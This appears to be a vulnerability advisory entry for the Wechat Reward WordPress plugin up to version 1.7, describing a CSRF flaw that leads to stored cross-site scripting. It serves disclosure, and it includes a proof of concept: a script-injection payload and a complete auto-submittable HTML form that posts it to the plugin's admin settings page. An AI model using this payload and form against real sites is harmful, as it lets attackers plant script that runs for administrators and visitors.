WordPress Plugin Vulnerabilities
Wechat Reward <= 1.7 - CSRF to Stored Cross-Site Scripting
Description
The plugin does not sanitise or escape its QR settings, nor has any CSRF check in place, allowing attackers to make a logged in admin change the settings and perform Cross-Site Scripting attacks.
Proof of Concept
Put the following payload in the QR setting: "><script>alert(/XSS/)</script> The XSS will be triggered in the plugin's setting page, as well as all frontend posts. via CSRF: <html> <body> <form action="https://example.com/wp-admin/options-general.php?page=upload_wechat_QR" method="POST"> <input type="hidden" name="wechatQR" value='"><script>alert(/XSS/)</script>' /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
听雨眠
Submitter
tym
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-20 (about 2 years ago)
Added
2021-09-20 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)